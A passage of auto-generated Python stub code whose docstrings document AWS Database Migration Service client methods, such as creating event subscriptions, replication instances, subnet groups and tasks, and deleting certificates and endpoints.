If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``\"arn:aws:s3:::*\"`` to use the following actions: ``\"s3:PutObject\", \"s3:ListBucket\"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of chars you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is \"?\".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), \'timeformat_string\', \'epochsecs\', or \'epochmillisecs\'. It defaults to 10. Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
:rtype: dict
:returns:
"""
pass
def create_event_subscription(self, SubscriptionName: str, SnsTopicArn: str, SourceType: str = None, EventCategories: List = None, SourceIds: List = None, Enabled: bool = None, Tags: List = None) -> Dict:
"""
Creates an AWS DMS event notification subscription.
You can specify the type of source (``SourceType`` ) you want to be notified of, provide a list of AWS DMS source IDs (``SourceIds`` ) that triggers the events, and provide a list of event categories (``EventCategories`` ) for events you want to be notified of. If you specify both the ``SourceType`` and ``SourceIds`` , such as ``SourceType = replication-instance`` and ``SourceIdentifier = my-replinstance`` , you will be notified of all the replication instance events for the specified source. If you specify a ``SourceType`` but don't specify a ``SourceIdentifier`` , you receive notice of the events for that source type for all your AWS DMS sources. If you don't specify either ``SourceType`` nor ``SourceIdentifier`` , you will be notified of events generated from all AWS DMS sources belonging to your customer account.
For more information about AWS DMS events, see `Working with Events and Notifications <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Events.html>`__ in the *AWS Database Migration Service User Guide.*
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/CreateEventSubscription>`_
**Request Syntax**
::
response = client.create_event_subscription(
SubscriptionName='string',
SnsTopicArn='string',
SourceType='string',
EventCategories=[
'string',
],
SourceIds=[
'string',
],
Enabled=True|False,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{
'EventSubscription': {
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False
}
}
**Response Structure**
- *(dict) --*
- **EventSubscription** *(dict) --*
The event subscription that was created.
- **CustomerAwsId** *(string) --*
The AWS customer account associated with the AWS DMS event notification subscription.
- **CustSubscriptionId** *(string) --*
The AWS DMS event notification subscription Id.
- **SnsTopicArn** *(string) --*
The topic ARN of the AWS DMS event notification subscription.
- **Status** *(string) --*
The status of the AWS DMS event notification subscription.
Constraints:
Can be one of the following: creating | modifying | deleting | active | no-permission | topic-not-exist
The status "no-permission" indicates that AWS DMS no longer has permission to post to the SNS topic. The status "topic-not-exist" indicates that the topic was deleted after the subscription was created.
- **SubscriptionCreationTime** *(string) --*
The time the RDS event notification subscription was created.
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | replication-server | security-group | migration-task
- **SourceIdsList** *(list) --*
A list of source Ids for the event subscription.
- *(string) --*
- **EventCategoriesList** *(list) --*
A lists of event categories.
- *(string) --*
- **Enabled** *(boolean) --*
Boolean value that indicates if the event subscription is enabled.
:type SubscriptionName: string
:param SubscriptionName: **[REQUIRED]**
The name of the AWS DMS event notification subscription.
Constraints: The name must be less than 255 characters.
:type SnsTopicArn: string
:param SnsTopicArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the Amazon SNS topic created for event notification. The ARN is created by Amazon SNS when you create a topic and subscribe to it.
:type SourceType: string
:param SourceType:
The type of AWS DMS resource that generates the events. For example, if you want to be notified of events generated by a replication instance, you set this parameter to ``replication-instance`` . If this value is not specified, all events are returned.
Valid values: replication-instance | migration-task
:type EventCategories: list
:param EventCategories:
A list of event categories for a source type that you want to subscribe to. You can see a list of the categories for a given source type by calling the ``DescribeEventCategories`` action or in the topic `Working with Events and Notifications <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Events.html>`__ in the *AWS Database Migration Service User Guide.*
- *(string) --*
:type SourceIds: list
:param SourceIds:
The list of identifiers of the event sources for which events will be returned. If not specified, then all sources are included in the response. An identifier must begin with a letter and must contain only ASCII letters, digits, and hyphens; it cannot end with a hyphen or contain two consecutive hyphens.
- *(string) --*
:type Enabled: boolean
:param Enabled:
A Boolean value; set to ``true`` to activate the subscription, or set to ``false`` to create the subscription but not activate it.
:type Tags: list
:param Tags:
A tag to be attached to the event subscription.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:rtype: dict
:returns:
"""
pass
def create_replication_instance(self, ReplicationInstanceIdentifier: str, ReplicationInstanceClass: str, AllocatedStorage: int = None, VpcSecurityGroupIds: List = None, AvailabilityZone: str = None, ReplicationSubnetGroupIdentifier: str = None, PreferredMaintenanceWindow: str = None, MultiAZ: bool = None, EngineVersion: str = None, AutoMinorVersionUpgrade: bool = None, Tags: List = None, KmsKeyId: str = None, PubliclyAccessible: bool = None, DnsNameServers: str = None) -> Dict:
"""
Creates the replication instance using the specified parameters.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/CreateReplicationInstance>`_
**Request Syntax**
::
response = client.create_replication_instance(
ReplicationInstanceIdentifier='string',
AllocatedStorage=123,
ReplicationInstanceClass='string',
VpcSecurityGroupIds=[
'string',
],
AvailabilityZone='string',
ReplicationSubnetGroupIdentifier='string',
PreferredMaintenanceWindow='string',
MultiAZ=True|False,
EngineVersion='string',
AutoMinorVersionUpgrade=True|False,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
KmsKeyId='string',
PubliclyAccessible=True|False,
DnsNameServers='string'
)
**Response Syntax**
::
{
'ReplicationInstance': {
'ReplicationInstanceIdentifier': 'string',
'ReplicationInstanceClass': 'string',
'ReplicationInstanceStatus': 'string',
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'AvailabilityZone': 'string',
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'ReplicationInstanceClass': 'string',
'AllocatedStorage': 123,
'MultiAZ': True|False,
'EngineVersion': 'string'
},
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'KmsKeyId': 'string',
'ReplicationInstanceArn': 'string',
'ReplicationInstancePublicIpAddress': 'string',
'ReplicationInstancePrivateIpAddress': 'string',
'ReplicationInstancePublicIpAddresses': [
'string',
],
'ReplicationInstancePrivateIpAddresses': [
'string',
],
'PubliclyAccessible': True|False,
'SecondaryAvailabilityZone': 'string',
'FreeUntil': datetime(2015, 1, 1),
'DnsNameServers': 'string'
}
}
**Response Structure**
- *(dict) --*
- **ReplicationInstance** *(dict) --*
The replication instance that was created.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **ReplicationInstanceStatus** *(string) --*
The status of the replication instance.
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **InstanceCreateTime** *(datetime) --*
The time the replication instance was created.
- **VpcSecurityGroups** *(list) --*
The VPC security group for the instance.
- *(dict) --*
- **VpcSecurityGroupId** *(string) --*
The VPC security group Id.
- **Status** *(string) --*
The status of the VPC security group.
- **AvailabilityZone** *(string) --*
The Availability Zone for the instance.
- **ReplicationSubnetGroup** *(dict) --*
The subnet group for the replication instance.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the availability zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
- **PreferredMaintenanceWindow** *(string) --*
The maintenance window times for the replication instance.
- **PendingModifiedValues** *(dict) --*
The pending modification values.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **AutoMinorVersionUpgrade** *(boolean) --*
Boolean value indicating if minor version upgrades will be automatically applied to the instance.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstancePublicIpAddress** *(string) --*
The public IP address of the replication instance.
- **ReplicationInstancePrivateIpAddress** *(string) --*
The private IP address of the replication instance.
- **ReplicationInstancePublicIpAddresses** *(list) --*
The public IP address of the replication instance.
- *(string) --*
- **ReplicationInstancePrivateIpAddresses** *(list) --*
The private IP address of the replication instance.
- *(string) --*
- **PubliclyAccessible** *(boolean) --*
Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
- **SecondaryAvailabilityZone** *(string) --*
The availability zone of the standby replication instance in a Multi-AZ deployment.
- **FreeUntil** *(datetime) --*
The expiration date of the free replication instance that is part of the Free DMS program.
- **DnsNameServers** *(string) --*
The DNS name servers for the replication instance.
:type ReplicationInstanceIdentifier: string
:param ReplicationInstanceIdentifier: **[REQUIRED]**
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
:type AllocatedStorage: integer
:param AllocatedStorage:
The amount of storage (in gigabytes) to be initially allocated for the replication instance.
:type ReplicationInstanceClass: string
:param ReplicationInstanceClass: **[REQUIRED]**
The compute and memory capacity of the replication instance as specified by the replication instance class.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds:
Specifies the VPC security group to be used with the replication instance. The VPC security group must work with the VPC containing the replication instance.
- *(string) --*
:type AvailabilityZone: string
:param AvailabilityZone:
The EC2 Availability Zone that the replication instance will be created in.
Default: A random, system-chosen Availability Zone in the endpoint\'s region.
Example: ``us-east-1d``
:type ReplicationSubnetGroupIdentifier: string
:param ReplicationSubnetGroupIdentifier:
A subnet group to associate with the replication instance.
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow:
The weekly time range during which system maintenance can occur, in Universal Coordinated Time (UTC).
Format: ``ddd:hh24:mi-ddd:hh24:mi``
Default: A 30-minute window selected at random from an 8-hour block of time per region, occurring on a random day of the week.
Valid Days: Mon, Tue, Wed, Thu, Fri, Sat, Sun
Constraints: Minimum 30-minute window.
:type MultiAZ: boolean
:param MultiAZ:
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
:type EngineVersion: string
:param EngineVersion:
The engine version number of the replication instance.
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade:
Indicates that minor engine upgrades will be applied automatically to the replication instance during the maintenance window.
Default: ``true``
:type Tags: list
:param Tags:
Tags to be associated with the replication instance.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:type KmsKeyId: string
:param KmsKeyId:
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don\'t specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
:type PubliclyAccessible: boolean
:param PubliclyAccessible:
Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
:type DnsNameServers: string
:param DnsNameServers:
A list of DNS name servers supported for the replication instance.
:rtype: dict
:returns:
"""
pass
def create_replication_subnet_group(self, ReplicationSubnetGroupIdentifier: str, ReplicationSubnetGroupDescription: str, SubnetIds: List, Tags: List = None) -> Dict:
"""
Creates a replication subnet group given a list of the subnet IDs in a VPC.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/CreateReplicationSubnetGroup>`_
**Request Syntax**
::
response = client.create_replication_subnet_group(
ReplicationSubnetGroupIdentifier='string',
ReplicationSubnetGroupDescription='string',
SubnetIds=[
'string',
],
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **ReplicationSubnetGroup** *(dict) --*
The replication subnet group that was created.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the availability zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
:type ReplicationSubnetGroupIdentifier: string
:param ReplicationSubnetGroupIdentifier: **[REQUIRED]**
The name for the replication subnet group. This value is stored as a lowercase string.
Constraints: Must contain no more than 255 alphanumeric characters, periods, spaces, underscores, or hyphens. Must not be \"default\".
Example: ``mySubnetgroup``
:type ReplicationSubnetGroupDescription: string
:param ReplicationSubnetGroupDescription: **[REQUIRED]**
The description for the subnet group.
:type SubnetIds: list
:param SubnetIds: **[REQUIRED]**
The EC2 subnet IDs for the subnet group.
- *(string) --*
:type Tags: list
:param Tags:
The tag to be assigned to the subnet group.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:rtype: dict
:returns:
"""
pass
def create_replication_task(self, ReplicationTaskIdentifier: str, SourceEndpointArn: str, TargetEndpointArn: str, ReplicationInstanceArn: str, MigrationType: str, TableMappings: str, ReplicationTaskSettings: str = None, CdcStartTime: datetime = None, CdcStartPosition: str = None, CdcStopPosition: str = None, Tags: List = None) -> Dict:
"""
Creates a replication task using the specified parameters.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/CreateReplicationTask>`_
**Request Syntax**
::
response = client.create_replication_task(
ReplicationTaskIdentifier='string',
SourceEndpointArn='string',
TargetEndpointArn='string',
ReplicationInstanceArn='string',
MigrationType='full-load'|'cdc'|'full-load-and-cdc',
TableMappings='string',
ReplicationTaskSettings='string',
CdcStartTime=datetime(2015, 1, 1),
CdcStartPosition='string',
CdcStopPosition='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The replication task that was created.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position “2018-03-08T12:12:12”
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position “mysql-bin-changelog.000024:373”
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position “server_time:3018-02-09T12:12:12”
Commit time example: --cdc-stop-position “commit_time: 3018-02-09T12:12:12 “
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskIdentifier: string
:param ReplicationTaskIdentifier: **[REQUIRED]**
The replication task identifier.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
:type SourceEndpointArn: string
:param SourceEndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:type TargetEndpointArn: string
:param TargetEndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:type MigrationType: string
:param MigrationType: **[REQUIRED]**
The migration type.
:type TableMappings: string
:param TableMappings: **[REQUIRED]**
When using the AWS CLI or boto3, provide the path of the JSON file that contains the table mappings. Precede the path with \"file://\". When working with the DMS API, provide the JSON as the parameter value.
For example, --table-mappings file://mappingfile.json
:type ReplicationTaskSettings: string
:param ReplicationTaskSettings:
Settings for the task, such as target metadata settings. For a complete list of task settings, see `Task Settings for AWS Database Migration Service Tasks <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Tasks.CustomizingTasks.TaskSettings.html>`__ in the *AWS Database Migration User Guide.*
:type CdcStartTime: datetime
:param CdcStartTime:
Indicates the start time for a change data capture (CDC) operation. Use either CdcStartTime or CdcStartPosition to specify when you want a CDC operation to start. Specifying both values results in an error.
Timestamp Example: --cdc-start-time “2018-03-08T12:12:12”
:type CdcStartPosition: string
:param CdcStartPosition:
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position “2018-03-08T12:12:12”
Checkpoint Example: --cdc-start-position \"checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93\"
LSN Example: --cdc-start-position “mysql-bin-changelog.000024:373”
:type CdcStopPosition: string
:param CdcStopPosition:
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position “server_time:3018-02-09T12:12:12”
Commit time example: --cdc-stop-position “commit_time: 3018-02-09T12:12:12 “
:type Tags: list
:param Tags:
Tags to be added to the replication instance.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:rtype: dict
:returns:
"""
pass
def delete_certificate(self, CertificateArn: str) -> Dict:
"""
Deletes the specified certificate.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteCertificate>`_
**Request Syntax**
::
response = client.delete_certificate(
CertificateArn='string'
)
**Response Syntax**
::
{
'Certificate': {
'CertificateIdentifier': 'string',
'CertificateCreationDate': datetime(2015, 1, 1),
'CertificatePem': 'string',
'CertificateWallet': b'bytes',
'CertificateArn': 'string',
'CertificateOwner': 'string',
'ValidFromDate': datetime(2015, 1, 1),
'ValidToDate': datetime(2015, 1, 1),
'SigningAlgorithm': 'string',
'KeyLength': 123
}
}
**Response Structure**
- *(dict) --*
- **Certificate** *(dict) --*
The Secure Sockets Layer (SSL) certificate.
- **CertificateIdentifier** *(string) --*
The customer-assigned name of the certificate. Valid characters are A-z and 0-9.
- **CertificateCreationDate** *(datetime) --*
The date that the certificate was created.
- **CertificatePem** *(string) --*
The contents of the .pem X.509 certificate file for the certificate.
- **CertificateWallet** *(bytes) --*
The location of the imported Oracle Wallet certificate for use with SSL.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) for the certificate.
- **CertificateOwner** *(string) --*
The owner of the certificate.
- **ValidFromDate** *(datetime) --*
The beginning date that the certificate is valid.
- **ValidToDate** *(datetime) --*
The final date that the certificate is valid.
- **SigningAlgorithm** *(string) --*
The signing algorithm for the certificate.
- **KeyLength** *(integer) --*
The key length of the cryptographic algorithm being used.
:type CertificateArn: string
:param CertificateArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the deleted certificate.
:rtype: dict
:returns:
"""
pass
def delete_endpoint(self, EndpointArn: str) -> Dict:
"""
Deletes the specified endpoint.
.. note::
All tasks associated with the endpoint must be deleted before you can delete the endpoint.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteEndpoint>`_
**Request Syntax**
::
response = client.delete_endpoint(
EndpointArn='string'
)
**Response Syntax**
::
{
'Endpoint': {
'EndpointIdentifier': 'string',
'EndpointType': 'source'|'target',
'EngineName': 'string',
'EngineDisplayName': 'string',
'Username': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'ExtraConnectionAttributes': 'string',
'Status': 'string',
'KmsKeyId': 'string',
'EndpointArn': 'string',
'CertificateArn': 'string',
'SslMode': 'none'|'require'|'verify-ca'|'verify-full',
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'ExternalId': 'string',
'DynamoDbSettings': {
'ServiceAccessRoleArn': 'string'
},
'S3Settings': {
'ServiceAccessRoleArn': 'string',
